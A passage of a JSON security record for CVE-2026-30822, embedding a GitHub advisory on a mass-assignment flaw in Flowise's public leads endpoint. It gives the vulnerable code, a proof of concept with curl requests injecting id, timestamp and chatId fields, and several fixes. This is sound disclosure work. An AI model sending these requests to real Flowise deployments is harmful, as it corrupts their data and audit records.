                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-30822"
                },
                {
                    "category": "description",
                    "text": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, unauthenticated users can inject arbitrary values into internal database fields when creating leads. This issue has been patched in version 3.0.13.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-30822"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\n**A Mass Assignment vulnerability in the `/api/v1/leads` endpoint allows any unauthenticated user to control internal entity fields (`id`, `createdDate`, `chatId`) by including them in the request body.**\n\nThe endpoint uses `Object.assign()` to copy all properties from the request body to the Lead entity without any input validation or field filtering. This allows attackers to bypass auto-generated fields and inject arbitrary values.\n\n| Field | Value |\n|-------|-------|\n| **Vulnerability Type** | Mass Assignment |\n| **CWE ID** | [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html) |\n| **Authentication Required** | None |\n| **Affected Endpoint** | `POST /api/v1/leads` |\n\n\n---\n\n## Details\n\n### Root Cause\n\nThe vulnerability exists in `/packages/server/src/services/leads/index.ts` at lines 27-28:\n\n```typescript\n// File: /packages/server/src/services/leads/index.ts\n// Lines 23-38\n\nconst createLead = async (body: Partial<ILead>) => {\n    try {\n        const chatId = body.chatId ?? 
uuidv4()\n\n        const newLead = new Lead()\n        Object.assign(newLead, body)  // ← VULNERABILITY: All properties copied!\n        Object.assign(newLead, { chatId })\n\n        const appServer = getRunningExpressApp()\n        const lead = appServer.AppDataSource.getRepository(Lead).create(newLead)\n        const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n        return dbResponse\n    } catch (error) {\n        throw new InternalFlowiseError(...)\n    }\n}\n```\n\nThe `Object.assign(newLead, body)` on line 28 copies **ALL** properties from the request body to the Lead entity, including:\n- `id` - The primary key (should be auto-generated)\n- `createdDate` - The creation timestamp (should be auto-generated)\n- `chatId` - The chat identifier\n\n### Lead Entity Definition\n\nThe Lead entity at `/packages/server/src/database/entities/Lead.ts` uses TypeORM decorators that should auto-generate these fields:\n\n```typescript\n// File: /packages/server/src/database/entities/Lead.ts\n\n@Entity()\nexport class Lead implements ILead {\n    @PrimaryGeneratedColumn('uuid')  // Should be auto-generated!\n    id: string\n\n    @Column()\n    name?: string\n\n    @Column()\n    email?: string\n\n    @Column()\n    phone?: string\n\n    @Column()\n    chatflowid: string\n\n    @Column()\n    chatId: string\n\n    @CreateDateColumn()  // Should be auto-generated!\n    createdDate: Date\n}\n```\n\nHowever, `Object.assign()` overwrites these fields before they are saved, bypassing the auto-generation.\n\n### Why the Endpoint is Publicly Accessible\n\nThe `/api/v1/leads` endpoint is whitelisted in `/packages/server/src/utils/constants.ts`:\n\n```typescript\n// File: /packages/server/src/utils/constants.ts\n// Line 20\n\nexport const WHITELIST_URLS = [\n    // ... other endpoints ...\n    '/api/v1/leads',  // ← No authentication required\n    // ... 
more endpoints ...\n]\n```\n\n---\n\n## Proof of Concept\n\n<img width=\"1585\" height=\"817\" alt=\"Screenshot 2025-12-26 at 2 28 00 PM\" src=\"https://github.com/user-attachments/assets/807984e7-ae4f-4e8a-85b7-057d6ac42ff5\" />\n\n\n### Prerequisites\n\n- Docker and Docker Compose installed\n- curl installed\n\n### Step 1: Start Flowise\n\nCreate a `docker-compose.yml`:\n\n```yaml\nservices:\n  flowise:\n    image: flowiseai/flowise:latest\n    restart: unless-stopped\n    environment:\n      - PORT=3000\n      - DATABASE_PATH=/root/.flowise\n      - DATABASE_TYPE=sqlite\n      - CORS_ORIGINS=*\n      - DISABLE_FLOWISE_TELEMETRY=true\n    ports:\n      - '3000:3000'\n    volumes:\n      - flowise_data:/root/.flowise\n    entrypoint: /bin/sh -c \"sleep 3; flowise start\"\n\nvolumes:\n  flowise_data:\n```\n\nStart the container:\n\n```bash\ndocker compose up -d\n# Wait for Flowise to be ready (about 1-2 minutes)\ncurl http://localhost:3000/api/v1/ping\n```\n\n### Step 2: Baseline Test - Normal Lead Creation\n\nFirst, create a normal lead to see expected behavior:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"chatflowid\": \"normal-chatflow-123\",\n    \"name\": \"Normal User\",\n    \"email\": \"normal@example.com\",\n    \"phone\": \"555-0000\"\n  }'\n```\n\n**Expected Response (normal behavior):**\n```json\n{\n    \"id\": \"018b23e3-d6cb-4dc5-a276-922a174b44fd\",\n    \"name\": \"Normal User\",\n    \"email\": \"normal@example.com\",\n    \"phone\": \"555-0000\",\n    \"chatflowid\": \"normal-chatflow-123\",\n    \"chatId\": \"auto-generated-uuid\",\n    \"createdDate\": \"2025-12-26T06:20:39.000Z\"\n}\n```\n\nNote: The `id` and `createdDate` are auto-generated by the server.\n\n### Step 3: Exploit - Inject Custom ID\n\nNow inject a custom `id`:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"chatflowid\": 
\"attacker-chatflow-456\",\n    \"name\": \"Attacker\",\n    \"email\": \"attacker@evil.com\",\n    \"phone\": \"555-EVIL\",\n    \"id\": \"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\"\n  }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n    \"id\": \"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\n    \"name\": \"Attacker\",\n    \"email\": \"attacker@evil.com\",\n    \"phone\": \"555-EVIL\",\n    \"chatflowid\": \"attacker-chatflow-456\",\n    \"chatId\": \"auto-generated-uuid\",\n    \"createdDate\": \"2025-12-26T06:20:40.000Z\"\n}\n```\n\n**⚠️ The attacker-controlled `id` was accepted!**\n\n### Step 4: Exploit - Inject Custom Timestamp\n\nInject a fake `createdDate`:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"chatflowid\": \"timestamp-test-789\",\n    \"name\": \"Time Traveler\",\n    \"email\": \"timetraveler@evil.com\",\n    \"createdDate\": \"1970-01-01T00:00:00.000Z\"\n  }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n    \"id\": \"some-auto-generated-uuid\",\n    \"name\": \"Time Traveler\",\n    \"email\": \"timetraveler@evil.com\",\n    \"chatflowid\": \"timestamp-test-789\",\n    \"chatId\": \"auto-generated-uuid\",\n    \"createdDate\": \"1970-01-01T00:00:00.000Z\"\n}\n```\n\n**⚠️ The attacker-controlled timestamp from 1970 was accepted!**\n\n### Step 5: Exploit - Combined Mass Assignment\n\nInject multiple fields at once:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"chatflowid\": \"any-chatflow-attacker-wants\",\n    \"name\": \"Mass Assignment Attacker\",\n    \"email\": \"massassign@evil.com\",\n    \"phone\": \"555-HACK\",\n    \"id\": \"11111111-2222-3333-4444-555555555555\",\n    \"createdDate\": \"2000-01-01T12:00:00.000Z\",\n    \"chatId\": \"custom-chat-id-injected\"\n  }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n    \"id\": 
\"11111111-2222-3333-4444-555555555555\",\n    \"name\": \"Mass Assignment Attacker\",\n    \"email\": \"massassign@evil.com\",\n    \"phone\": \"555-HACK\",\n    \"chatflowid\": \"any-chatflow-attacker-wants\",\n    \"chatId\": \"custom-chat-id-injected\",\n    \"createdDate\": \"2000-01-01T12:00:00.000Z\"\n}\n```\n\n**⚠️ ALL three internal fields (`id`, `createdDate`, `chatId`) were controlled by the attacker!**\n\n### Verification\n\nThe exploit succeeds because:\n1. ✅ HTTP 200 response (request accepted)\n2. ✅ `id` field contains attacker-controlled UUID\n3. ✅ `createdDate` field contains attacker-controlled timestamp\n4. ✅ `chatId` field contains attacker-controlled string\n5. ✅ No authentication headers were sent\n\n---\n\n## Impact\n\n### Who is Affected?\n\n- **All Flowise deployments** that use the leads feature\n- Both **open-source** and **enterprise** versions\n- Any system that relies on lead data integrity\n\n### Attack Scenarios\n\n| Scenario | Impact |\n|----------|--------|\n| **ID Collision Attack** | Attacker creates leads with specific UUIDs, potentially overwriting existing records or causing database conflicts |\n| **Audit Trail Manipulation** | Attacker sets fake `createdDate` values to hide malicious activity or manipulate reporting |\n| **Data Integrity Violation** | Internal fields that should be server-controlled are now user-controlled |\n| **Chatflow Association** | Attacker can link leads to arbitrary chatflows they don't own |\n\n### Severity Assessment\n\nWhile this vulnerability doesn't directly expose sensitive data (unlike the IDOR vulnerability), it violates the principle that internal/auto-generated fields should not be user-controllable. 
This can lead to:\n\n- Data integrity issues\n- Potential business logic bypasses\n- Audit/compliance concerns\n- Foundation for chained attacks\n\n---\n\n## Recommended Fix\n\n### Option 1: Whitelist Allowed Fields (Recommended)\n\nOnly copy explicitly allowed fields from the request body:\n\n```typescript\nconst createLead = async (body: Partial<ILead>) => {\n    try {\n        const chatId = body.chatId ?? uuidv4()\n\n        const newLead = new Lead()\n        \n        // ✅ Only copy allowed fields\n        const allowedFields = ['chatflowid', 'name', 'email', 'phone']\n        for (const field of allowedFields) {\n            if (body[field] !== undefined) {\n                newLead[field] = body[field]\n            }\n        }\n        newLead.chatId = chatId\n        // Let TypeORM auto-generate id and createdDate\n\n        const appServer = getRunningExpressApp()\n        const lead = appServer.AppDataSource.getRepository(Lead).create(newLead)\n        const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n        return dbResponse\n    } catch (error) {\n        throw new InternalFlowiseError(...)\n    }\n}\n```\n\n### Option 2: Use Destructuring with Explicit Fields\n\n```typescript\nconst createLead = async (body: Partial<ILead>) => {\n    try {\n        // ✅ Only extract allowed fields\n        const { chatflowid, name, email, phone } = body\n        const chatId = body.chatId ?? 
uuidv4()\n\n        const appServer = getRunningExpressApp()\n        const lead = appServer.AppDataSource.getRepository(Lead).create({\n            chatflowid,\n            name,\n            email,\n            phone,\n            chatId\n            // id and createdDate will be auto-generated\n        })\n        \n        const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n        return dbResponse\n    } catch (error) {\n        throw new InternalFlowiseError(...)\n    }\n}\n```\n\n### Option 3: Use class-transformer with @Exclude()\n\nAdd decorators to the Lead entity to exclude sensitive fields from assignment (note: class-transformer decorators only take effect when the request body is mapped with its `plainToInstance()`; a plain `Object.assign()` ignores them, so this option must be combined with replacing the `Object.assign()` call):\n\n```typescript\nimport { Exclude } from 'class-transformer'\n\n@Entity()\nexport class Lead implements ILead {\n    @PrimaryGeneratedColumn('uuid')\n    @Exclude({ toClassOnly: true })  // ✅ Prevent assignment from request\n    id: string\n\n    // ... other fields ...\n\n    @CreateDateColumn()\n    @Exclude({ toClassOnly: true })  // ✅ Prevent assignment from request\n    createdDate: Date\n}\n```\n\n### Additional Recommendation\n\nConsider applying the same fix to other endpoints that use `Object.assign()` with request bodies, such as:\n- `/packages/server/src/utils/addChatMessageFeedback.ts` (similar pattern)\n\n---\n\n## Resources\n\n- [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html)\n- [OWASP: Mass Assignment Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)\n- [OWASP API Security Top 10 - API6:2023 Unrestricted Access to Sensitive Business Flows](https://owasp.org/API-Security/editions/2023/en/0xa6-unrestricted-access-to-sensitive-business-flows/)\n- [Node.js Security Best Practices](https://nodejs.org/en/docs/guides/security/)\n\n---",
                    "title": "github - https://api.github.com/advisories/GHSA-mq4r-h2gh-qv7x"
                },
                {
                    "category": "other",
                    "text": "0.00132",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "4.2",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is product data available from source Certbundde",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "There is exploit data available from source Nvd, Is related to (a version of) an uncommon product",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5766734",
                    "CSAFPID-5767907",
                    "CSAFPID-5768607"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0626.json"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-mq4r-h2gh-qv7x"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-mq4r-h2gh-qv7x"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-mq4r-h2gh-qv7x.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30822"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-30822"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-30822"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/30xxx/CVE-2026-30822.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30822"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-mq4r-h2gh-qv7x"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0626.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0626"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j8g8-j7fc-43v6"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jc5m-wrp2-qq38"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde; cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-mq4r-h2gh-qv7x"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wvhq-wp8g-c7vq"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x2g5-fvc2-gqvp"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-mq4r-h2gh-qv7x"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30822"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.0",
                        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L",
                        "baseScore": 7.7,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5766734",
                        "CSAFPID-5767907",
                        "CSAFPID-5768607"
                    ]
                }
            ],
            "title": "CVE-2026-30822"
        }
    ]
}